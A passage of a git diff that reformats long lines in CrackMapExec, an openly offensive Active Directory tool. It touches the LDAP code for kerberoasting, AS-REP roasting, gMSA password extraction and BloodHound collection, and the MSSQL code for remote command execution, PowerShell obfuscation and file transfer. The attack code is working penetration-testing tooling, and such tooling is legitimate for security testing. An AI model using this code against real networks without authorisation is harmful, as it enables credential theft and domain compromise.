self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "servicePrincipalName": for spn in attribute["vals"]: SPNs.append(str(spn)) if mustCommit is True: if int(userAccountControl) & UF_ACCOUNTDISABLE: - self.logger.debug( - f"Bypassing disabled account {sAMAccountName} " - ) + self.logger.debug(f"Bypassing disabled account {sAMAccountName} ") else: for spn in SPNs: answers.append( @@ -1218,9 +1079,7 @@ class ldap(connection): ] ) except Exception as e: - cme_logger.error( - f"Skipping item, cannot process due to error {str(e)}" - ) + cme_logger.error(f"Skipping item, cannot process due to error {str(e)}") pass if len(answers) > 0: @@ -1240,9 +1099,7 @@ class ldap(connection): try: principalName = Principal() - principalName.type = ( - constants.PrincipalNameType.NT_MS_PRINCIPAL.value - ) + principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value principalName.components = [downLevelLogonName] tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS( @@ -1260,13 +1117,9 @@ class ldap(connection): sAMAccountName, self.targetDomain + "/" + sAMAccountName, ) - self.logger.highlight( - f"sAMAccountName: {sAMAccountName} memberOf: {memberOf} pwdLastSet: {pwdLastSet} lastLogon:{lastLogon}" - ) + self.logger.highlight(f"sAMAccountName: {sAMAccountName} memberOf: {memberOf} pwdLastSet: {pwdLastSet} lastLogon:{lastLogon}") self.logger.highlight(f"{r}") - with open( - self.args.kerberoasting, "a+" - ) as hash_kerberoasting: + with open(self.args.kerberoasting, "a+") as hash_kerberoasting: hash_kerberoasting.write(r + "\n") dejavue.append(sAMAccountName) except Exception as e: @@ -1315,20 +1168,12 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) if mustCommit is True: answers.append( [ @@ -1369,9 +1214,7 @@ class ldap(connection): ) except ldap_impacket.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - self.logger.debug( - "sizeLimitExceeded exception caught, giving up and processing the data received" - ) + self.logger.debug("sizeLimitExceeded exception caught, giving up and processing the data received") # We reached the sizeLimit, process the answers we have already and that's it. Until we implement # paged queries resp = e.getAnswers() @@ -1406,20 +1249,12 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) if mustCommit is True: answers.append( [ @@ -1433,9 +1268,7 @@ class ldap(connection): ) except Exception as e: self.logger.debug("Exception:", exc_info=True) - self.logger.debug( - f"Skipping item, cannot process due to error {str(e)}" - ) + self.logger.debug(f"Skipping item, cannot process due to error {str(e)}") pass if len(answers) > 0: self.logger.debug(answers) @@ -1481,20 +1314,12 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) if mustCommit is True: answers.append( [ @@ -1507,9 +1332,7 @@ class ldap(connection): ) except Exception as e: self.logger.debug("Exception:", exc_info=True) - self.logger.debug( - f"Skipping item, cannot process due to error {str(e)}" - ) + self.logger.debug(f"Skipping item, cannot process due to error {str(e)}") pass if len(answers) > 0: self.logger.debug(answers) @@ -1560,9 +1383,7 @@ class ldap(connection): gmsa_account_name = (domain_name + account_name).upper() self.logger.debug(f"GMSA name for {gmsa_account_name}") bin_account_name = gmsa_account_name.encode("utf-16le") - bin_hash = hmac.new( - bytes("", "latin-1"), msg=bin_account_name, digestmod=hashlib.sha256 - ).digest() + bin_hash = hmac.new(bytes("", "latin-1"), msg=bin_account_name, digestmod=hashlib.sha256).digest() hex_letters = "0123456789abcdef" str_hash = "" for b in bin_hash: @@ -1586,29 +1407,17 @@ class ldap(connection): ) if gmsa_accounts: answers = [] - self.logger.debug( - f"Total of records returned {len(gmsa_accounts):d}" - ) + self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}") for item in gmsa_accounts: - if ( - isinstance(item, ldapasn1_impacket.SearchResultEntry) - is not True - ): + if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True: continue sAMAccountName = "" for attribute in item["attributes"]: if str(attribute["type"]) == "sAMAccountName": sAMAccountName = str(attribute["vals"][0]) - if ( - self.decipher_gmsa_name( - self.domain.split(".")[0], sAMAccountName[:-1] - ) - == self.args.gmsa_convert_id - ): - self.logger.highlight( - f"Account: {sAMAccountName:<20} ID: {self.args.gmsa_convert_id}" - ) + if self.decipher_gmsa_name(self.domain.split(".")[0], sAMAccountName[:-1]) == self.args.gmsa_convert_id: + self.logger.highlight(f"Account: {sAMAccountName:<20} ID: {self.args.gmsa_convert_id}") break else: self.logger.fail("No string provided :'(") @@ -1629,26 +1438,16 @@ class ldap(connection): ) if gmsa_accounts: answers = [] - self.logger.debug( - f"Total of records returned {len(gmsa_accounts):d}" - ) + self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}") for item in gmsa_accounts: - if ( - isinstance(item, ldapasn1_impacket.SearchResultEntry) - is not True - ): + if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True: continue sAMAccountName = "" for attribute in item["attributes"]: if str(attribute["type"]) == "sAMAccountName": sAMAccountName = str(attribute["vals"][0]) - if ( - self.decipher_gmsa_name( - self.domain.split(".")[0], sAMAccountName[:-1] - ) - == gmsa_id - ): + if self.decipher_gmsa_name(self.domain.split(".")[0], sAMAccountName[:-1]) == gmsa_id: gmsa_id = sAMAccountName break # convert to ntlm @@ -1681,14 +1480,10 @@ class ldap(connection): dns_tcp=False, dns_timeout=3, ) - collect = resolve_collection_methods( - "Default" if not self.args.collection else self.args.collection - ) + collect = resolve_collection_methods("Default" if not self.args.collection else self.args.collection) if not collect: return - self.logger.highlight( - "Resolved collection methods: %s", ", ".join(list(collect)) - ) + self.logger.highlight("Resolved collection methods: %s", ", ".join(list(collect))) self.logger.debug("Using DNS to retrieve domain information") ad.dns_resolve(domain=self.domain) @@ -1713,9 +1508,7 @@ class ldap(connection): exclude_dcs=False, ) - self.logger.highlight( - f"Compressing output into {self.output_filename}bloodhound.zip" - ) + self.logger.highlight(f"Compressing output into {self.output_filename}bloodhound.zip") list_of_files = os.listdir(os.getcwd()) with ZipFile(self.output_filename + "bloodhound.zip", "w") as z: for each_file in list_of_files: diff --git a/cme/protocols/ldap/bloodhound.py b/cme/protocols/ldap/bloodhound.py index b85d2f21..1b9f42db 100644 --- a/cme/protocols/ldap/bloodhound.py +++ b/cme/protocols/ldap/bloodhound.py @@ -18,21 +18,15 @@ class BloodHound(object): self.proto_logger(port, hostname, host) def proto_logger(self, port, hostname, host): - self.logger = CMEAdapter( - extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname} - ) + self.logger = CMEAdapter(extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname}) def connect(self): if len(self.ad.dcs()) == 0: - self.logger.fail( - "Could not find a domain controller. Consider specifying a domain and/or DNS server." - ) + self.logger.fail("Could not find a domain controller. Consider specifying a domain and/or DNS server.") sys.exit(1) if not self.ad.baseDN: - self.logger.fail( - "Could not figure out the domain to query. Please specify this manually with -d" - ) + self.logger.fail("Could not figure out the domain to query. Please specify this manually with -d") sys.exit(1) pdc = self.ad.dcs()[0] @@ -87,9 +81,7 @@ class BloodHound(object): cache_computers=do_computer_enum, ) # Initialize enumerator - membership_enum = MembershipEnumerator( - self.ad, self.pdc, collect, disable_pooling - ) + membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling) membership_enum.enumerate_memberships(timestamp=timestamp) elif "container" in collect: # Fetch domains for later, computers if needed @@ -99,16 +91,12 @@ class BloodHound(object): cache_computers=do_computer_enum, ) # Initialize enumerator - membership_enum = MembershipEnumerator( - self.ad, self.pdc, collect, disable_pooling - ) + membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling) membership_enum.do_container_collection(timestamp=timestamp) elif do_computer_enum: # We need to know which computers to query regardless # We also need the domains to have a mapping from NETBIOS -> FQDN for local admins - self.pdc.prefetch_info( - "objectprops" in collect, "acl" in collect, cache_computers=True - ) + self.pdc.prefetch_info("objectprops" in collect, "acl" in collect, cache_computers=True) elif "trusts" in collect: # Prefetch domains self.pdc.get_domains("acl" in collect) @@ -126,9 +114,7 @@ class BloodHound(object): computerfile=computerfile, exclude_dcs=exclude_dcs, ) - computer_enum.enumerate_computers( - self.ad.computers, num_workers=num_workers, timestamp=timestamp - ) + computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp) end_time = time.time() minutes, seconds = divmod(int(end_time - start_time), 60) self.logger.highlight("Done in %02dM %02dS" % (minutes, seconds)) diff --git a/cme/protocols/ldap/database.py b/cme/protocols/ldap/database.py index 7df4a37a..d702a5db 100644 --- a/cme/protocols/ldap/database.py +++ b/cme/protocols/ldap/database.py @@ -47,19 +47,10 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.CredentialsTable = Table( - "credentials", self.metadata, autoload_with=self.db_engine - ) - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): diff --git a/cme/protocols/ldap/db_navigator.py b/cme/protocols/ldap/db_navigator.py index b1afbf92..36777af1 100644 --- a/cme/protocols/ldap/db_navigator.py +++ b/cme/protocols/ldap/db_navigator.py @@ -6,12 +6,7 @@ from cme.cmedb import DatabaseNavigator, print_help class navigator(DatabaseNavigator): def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/ldap/gmsa.py b/cme/protocols/ldap/gmsa.py index 5700914e..3e2e7f31 100644 --- a/cme/protocols/ldap/gmsa.py +++ b/cme/protocols/ldap/gmsa.py @@ -28,20 +28,9 @@ class MSDS_MANAGEDPASSWORD_BLOB(Structure): else: endData = self["PreviousPasswordOffset"] - self["CurrentPassword"] = self.rawData[self["CurrentPasswordOffset"] :][ - : endData - self["CurrentPasswordOffset"] - ] + self["CurrentPassword"] = self.rawData[self["CurrentPasswordOffset"] :][: endData - self["CurrentPasswordOffset"]] if self["PreviousPasswordOffset"] != 0: - self["PreviousPassword"] = self.rawData[self["PreviousPasswordOffset"] :][ - : self["QueryPasswordIntervalOffset"] - self["PreviousPasswordOffset"] - ] + self["PreviousPassword"] = self.rawData[self["PreviousPasswordOffset"] :][: self["QueryPasswordIntervalOffset"] - self["PreviousPasswordOffset"]] - self["QueryPasswordInterval"] = self.rawData[ - self["QueryPasswordIntervalOffset"] : - ][ - : self["UnchangedPasswordIntervalOffset"] - - self["QueryPasswordIntervalOffset"] - ] - self["UnchangedPasswordInterval"] = self.rawData[ - self["UnchangedPasswordIntervalOffset"] : - ] + self["QueryPasswordInterval"] = self.rawData[self["QueryPasswordIntervalOffset"] :][: self["UnchangedPasswordIntervalOffset"] - self["QueryPasswordIntervalOffset"]] + self["UnchangedPasswordInterval"] = self.rawData[self["UnchangedPasswordIntervalOffset"] :] diff --git a/cme/protocols/ldap/kerberos.py b/cme/protocols/ldap/kerberos.py index 584a2d27..cca85b9d 100644 --- a/cme/protocols/ldap/kerberos.py +++ b/cme/protocols/ldap/kerberos.py @@ -65,76 +65,44 @@ class KerberosAttacks: # Regarding AES encryption type (AES128 CTS HMAC-SHA1 96 and AES256 CTS HMAC-SHA1 96) # last 12 bytes of the encrypted ticket represent the checksum of the decrypted # ticket - if ( - decodedTGS["ticket"]["enc-part"]["etype"] - == constants.EncryptionTypes.rc4_hmac.value - ): + if decodedTGS["ticket"]["enc-part"]["etype"] == constants.EncryptionTypes.rc4_hmac.value: entry = "$krb5tgs$%d$*%s$%s$%s*$%s$%s" % ( constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS["ticket"]["realm"], spn.replace(":", "~"), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][:16].asOctets() - ).decode(), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][16:].asOctets() - ).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][:16].asOctets()).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][16:].asOctets()).decode(), ) - elif ( - decodedTGS["ticket"]["enc-part"]["etype"] - == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value - ): + elif decodedTGS["ticket"]["enc-part"]["etype"] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value: entry = "$krb5tgs$%d$%s$%s$*%s*$%s$%s" % ( constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, decodedTGS["ticket"]["realm"], spn.replace(":", "~"), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][-12:].asOctets() - ).decode(), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][:-12:].asOctets() - ).decode, + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][-12:].asOctets()).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][:-12:].asOctets()).decode, ) - elif ( - decodedTGS["ticket"]["enc-part"]["etype"] - == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value - ): + elif decodedTGS["ticket"]["enc-part"]["etype"] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value: entry = "$krb5tgs$%d$%s$%s$*%s*$%s$%s" % ( constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, decodedTGS["ticket"]["realm"], spn.replace(":", "~"), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][-12:].asOctets() - ).decode(), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][:-12:].asOctets() - ).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][-12:].asOctets()).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][:-12:].asOctets()).decode(), ) - elif ( - decodedTGS["ticket"]["enc-part"]["etype"] - == constants.EncryptionTypes.des_cbc_md5.value - ): + elif decodedTGS["ticket"]["enc-part"]["etype"] == constants.EncryptionTypes.des_cbc_md5.value: entry = "$krb5tgs$%d$*%s$%s$%s*$%s$%s" % ( constants.EncryptionTypes.des_cbc_md5.value, username, decodedTGS["ticket"]["realm"], spn.replace(":", "~"), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][:16].asOctets() - ).decode(), - hexlify( - decodedTGS["ticket"]["enc-part"]["cipher"][16:].asOctets() - ).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][:16].asOctets()).decode(), + hexlify(decodedTGS["ticket"]["enc-part"]["cipher"][16:].asOctets()).decode(), ) else: - cme_logger.error( - "Skipping" - f" {decodedTGS['ticket']['sname']['name-string'][0]}/{decodedTGS['ticket']['sname']['name-string'][1]} due" - f" to incompatible e-type {decodedTGS['ticket']['enc-part']['etype']:d}" - ) + cme_logger.error("Skipping" f" {decodedTGS['ticket']['sname']['name-string'][0]}/{decodedTGS['ticket']['sname']['name-string'][1]} due" f" to incompatible e-type {decodedTGS['ticket']['enc-part']['etype']:d}") return entry @@ -160,9 +128,7 @@ class KerberosAttacks: pass # No TGT in cache, request it - userName = Principal( - self.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value - ) + userName = Principal(self.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value) # In order to maximize the probability of getting session tickets with RC4 etype, we will convert the # password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the @@ -209,16 +175,12 @@ class KerberosAttacks: return TGT def getTGT_asroast(self, userName, requestPAC=True): - clientName = Principal( - userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value - ) + clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value) asReq = AS_REQ() domain = self.targetDomain.upper() - serverName = Principal( - "krbtgt/%s" % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value - ) + serverName = Principal("krbtgt/%s" % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value) pacRequest = KERB_PA_PAC_REQUEST() pacRequest["include-pac"] = requestPAC @@ -229,9 +191,7 @@ class KerberosAttacks: asReq["padata"] = noValue asReq["padata"][0] = noValue - asReq["padata"][0]["padata-type"] = int( - constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value - ) + asReq["padata"][0]["padata-type"] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value) asReq["padata"][0]["padata-value"] = encodedPacRequest reqBody = seq_set(asReq, "req-body") @@ -274,11 +234,7 @@ class KerberosAttacks: message = encoder.encode(asReq) r = sendReceive(message, domain, self.kdcHost) elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_KEY_EXPIRED.value: - return ( - "Password of user " - + userName - + " expired but user doesn't require pre-auth" - ) + return "Password of user " + userName + " expired but user doesn't require pre-auth" else: cme_logger.debug(e) return False @@ -292,9 +248,7 @@ class KerberosAttacks: asRep = decoder.decode(r, asn1Spec=AS_REP())[0] else: # The user doesn't have UF_DONT_REQUIRE_PREAUTH set - cme_logger.debug( - "User %s doesn't have UF_DONT_REQUIRE_PREAUTH set" % userName - ) + cme_logger.debug("User %s doesn't have UF_DONT_REQUIRE_PREAUTH set" % userName) return # Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it. diff --git a/cme/protocols/ldap/smbldap.py b/cme/protocols/ldap/smbldap.py index eacc92f9..8d0c0075 100644 --- a/cme/protocols/ldap/smbldap.py +++ b/cme/protocols/ldap/smbldap.py @@ -27,9 +27,7 @@ class LDAPConnect: self.proto_logger(host, port, hostname) def proto_logger(self, host, port, hostname): - self.logger = CMEAdapter( - extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname} - ) + self.logger = CMEAdapter(extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname}) def kerberos_login( self, @@ -82,9 +80,7 @@ class LDAPConnect: if str(e).find("strongerAuthRequired") >= 0: # We need to try SSL try: - ldapConnection = ldap_impacket.LDAPConnection( - f"ldaps://{kdcHost}", baseDN - ) + ldapConnection = ldap_impacket.LDAPConnection(f"ldaps://{kdcHost}", baseDN) ldapConnection.login( username, password, @@ -114,9 +110,7 @@ class LDAPConnect: return False except OSError as e: - self.logger.debug( - f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}" - ) + self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}") return False except KerberosError as e: self.logger.fail( @@ -144,9 +138,7 @@ class LDAPConnect: baseDN = baseDN[:-1] try: - ldapConnection = ldap_impacket.LDAPConnection( - f"ldap://{domain}", baseDN, domain - ) + ldapConnection = ldap_impacket.LDAPConnection(f"ldap://{domain}", baseDN, domain) ldapConnection.login(username, password, domain, lmhash, nthash) # Connect to LDAP @@ -161,9 +153,7 @@ class LDAPConnect: if str(e).find("strongerAuthRequired") >= 0: # We need to try SSL try: - ldapConnection = ldap_impacket.LDAPConnection( - f"ldaps://{domain}", baseDN, domain - ) + ldapConnection = ldap_impacket.LDAPConnection(f"ldaps://{domain}", baseDN, domain) ldapConnection.login(username, password, domain, lmhash, nthash) self.logger.extra["protocol"] = "LDAPS" self.logger.extra["port"] = "636" @@ -184,7 +174,5 @@ class LDAPConnect: return False except OSError as e: - self.logger.debug( - f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}" - ) + self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}") return False diff --git a/cme/protocols/mssql.py b/cme/protocols/mssql.py index 637d53e7..a79cf8ef 100755 --- a/cme/protocols/mssql.py +++ b/cme/protocols/mssql.py @@ -40,13 +40,9 @@ class mssql(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - mssql_parser = parser.add_parser( - "mssql", help="own stuff using MSSQL", parents=[std_parser, module_parser] - ) + mssql_parser = parser.add_parser("mssql", help="own stuff using MSSQL", parents=[std_parser, module_parser]) dgroup = mssql_parser.add_mutually_exclusive_group() - dgroup.add_argument( - "-d", metavar="DOMAIN", dest="domain", type=str, help="domain name" - ) + dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, help="domain name") dgroup.add_argument( "--local-auth", action="store_true", @@ -87,17 +83,13 @@ class mssql(connection): help="continues authentication attempts even after successes", ) - cgroup = mssql_parser.add_argument_group( - "Command Execution", "options for executing commands" - ) + cgroup = mssql_parser.add_argument_group("Command Execution", "options for executing commands") cgroup.add_argument( "--force-ps32", action="store_true", help="force the PowerShell command to run in a 32-bit process", ) - cgroup.add_argument( - "--no-output", action="store_true", help="do not retrieve command output" - ) + cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output") xgroup = cgroup.add_mutually_exclusive_group() xgroup.add_argument( "-x", @@ -112,21 +104,15 @@ class mssql(connection): help="execute the specified PowerShell command", ) - psgroup = mssql_parser.add_argument_group( - "Powershell Obfuscation", "Options for PowerShell script obfuscation" - ) - psgroup.add_argument( - "--obfs", action="store_true", help="Obfuscate PowerShell scripts" - ) + psgroup = mssql_parser.add_argument_group("Powershell Obfuscation", "Options for PowerShell script obfuscation") + psgroup.add_argument("--obfs", action="store_true", help="Obfuscate PowerShell scripts") psgroup.add_argument( "--clear-obfscripts", action="store_true", help="Clear all cached obfuscated PowerShell scripts", ) - tgroup = mssql_parser.add_argument_group( - "Files", "Options for put and get remote files" - ) + tgroup = mssql_parser.add_argument_group("Files", "Options for put and get remote files") tgroup.add_argument( "--put-file", nargs=2, @@ -198,9 +184,7 @@ class mssql(connection): if self.args.local_auth: self.domain = self.hostname except Exception as e: - self.logger.fail( - f"Error retrieving host domain: {e} specify one manually with the '-d' flag" - ) + self.logger.fail(f"Error retrieving host domain: {e} specify one manually with the '-d' flag") self.mssql_instances = self.conn.getInstances(0) self.db.add_host( @@ -217,9 +201,7 @@ class mssql(connection): pass def print_host_info(self): - self.logger.display( - f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})" - ) + self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})") # if len(self.mssql_instances) > 0: # self.logger.display("MSSQL DB Instances: {}".format(len(self.mssql_instances))) # for i, instance in enumerate(self.mssql_instances): @@ -313,19 +295,8 @@ class mssql(connection): f"{domain}\\" if not self.args.local_auth else "", username, # Show what was used between cleartext, nthash, aesKey and ccache - " from ccache" - if useCache - else ":%s" - % ( - kerb_pass - if not self.config.get("CME", "audit_mode") - else self.config.get("CME", "audit_mode") * 8 - ), - highlight( - f'({self.config.get("CME", "pwn3d_label")})' - if self.admin_privs - else "" - ), + " from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get("CME", "audit_mode") else self.config.get("CME", "audit_mode") * 8), + highlight(f'({self.config.get("CME", "pwn3d_label")})' if self.admin_privs else ""), ) self.logger.success(out) if not self.args.local_auth: @@ -337,9 +308,7 @@ class mssql(connection): "{}\\{}{} {}".format( f"{domain}\\" if not self.args.local_auth else "", username, - " from ccache" - if useCache - else f":{kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8}", + " from ccache" if useCache else f":{kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8}", e, ) ) @@ -356,9 +325,7 @@ class mssql(connection): # this is to prevent a decoding issue in impacket/ntlm.py:617 where it attempts to decode the domain if not domain: domain = "" - res = self.conn.login( - None, username, password, domain, None, not self.args.local_auth - ) + res = self.conn.login(None, username, password, domain, None, not self.args.local_auth) if res is not True: self.conn.printReplies() return False @@ -370,19 +337,13 @@ class mssql(connection): self.db.add_credential("plaintext", domain, username, password) if self.admin_privs: - self.db.add_admin_user( - "plaintext", domain, username, password, self.host - ) + self.db.add_admin_user("plaintext", domain, username, password, self.host) out = "{}{}:{} {}".format( f"{domain}\\" if not self.args.local_auth else "", username, process_secret(password), - highlight( - f'({self.config.get("CME", "pwn3d_label")})' - if self.admin_privs - else "" - ), + highlight(f'({self.config.get("CME", "pwn3d_label")})' if self.admin_privs else ""), ) self.logger.success(out) if not self.args.local_auth: @@ -438,11 +399,7 @@ class mssql(connection): domain, username, process_secret(ntlm_hash), - highlight( - f'({self.config.get("CME", "pwn3d_label")})' - if self.admin_privs - else "" - ), + highlight(f'({self.config.get("CME", "pwn3d_label")})' if self.admin_privs else ""), ) self.logger.success(out) if not self.args.local_auth: @@ -506,9 +463,7 @@ class mssql(connection): get_output = True # We're disabling PS obfuscation by default as it breaks the MSSQLEXEC execution method - ps_command = create_ps_command( - payload, force_ps32=force_ps32, dont_obfs=dont_obfs - ) + ps_command = create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs) return self.execute(ps_command, get_output) @requires_admin @@ -523,9 +478,7 @@ class mssql(connection): if exec_method.file_exists(self.args.put_file[1]): self.logger.success("File has been uploaded on the remote machine") else: - self.logger.fail( - "File does not exist on the remote system... error during upload" - ) + self.logger.fail("File does not exist on the remote system... error during upload") except Exception as e: self.logger.fail(f"Error during upload : {e}") @@ -535,9 +488,7 @@ class mssql(connection): try: exec_method = MSSQLEXEC(self.conn) exec_method.get_file(self.args.get_file[0], self.args.get_file[1]) - self.logger.success( - f"File {self.args.get_file[0]} was transferred to {self.args.get_file[1]}" - ) + self.logger.success(f"File {self.args.get_file[0]} was transferred to {self.args.get_file[1]}") except Exception as e: self.logger.fail(f"Error reading file {self.args.get_file[0]}: {e}") @@ -548,20 +499,14 @@ class mssql(connection): for i, key in enumerate(self.replies[keys]): if key["TokenType"] == TDS_ERROR_TOKEN: error = f"ERROR({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}" - self.lastError = SQLErrorException( - f"ERROR: Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}" - ) + self.lastError = SQLErrorException(f"ERROR: Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}") self._MSSQL__rowsPrinter.error(error) elif key["TokenType"] == TDS_INFO_TOKEN: - self._MSSQL__rowsPrinter.info( - f"INFO({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}" - ) + self._MSSQL__rowsPrinter.info(f"INFO({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}") elif key["TokenType"] == TDS_LOGINACK_TOKEN: - self._MSSQL__rowsPrinter.info( - f"ACK: Result: {key['Interface']} - {key['ProgName'].decode('utf-16le')} ({key['MajorVer']:d}{key['MinorVer']:d} {key['BuildNumHi']:d}{key['BuildNumLow']:d}) " - ) + self._MSSQL__rowsPrinter.info(f"ACK: Result: {key['Interface']} - {key['ProgName'].decode('utf-16le')} ({key['MajorVer']:d}{key['MinorVer']:d} {key['BuildNumHi']:d}{key['BuildNumLow']:d}) ") elif key["TokenType"] == TDS_ENVCHANGE_TOKEN: if key["Type"] in ( @@ -585,8 +530,6 @@ class mssql(connection): _type = "PACKETSIZE" else: _type = f"{key['Type']:d}" - self._MSSQL__rowsPrinter.info( - f"ENVCHANGE({_type}): Old Value: {record['OldValue'].decode('utf-16le')}, New Value: {record['NewValue'].decode('utf-16le')}" - ) + 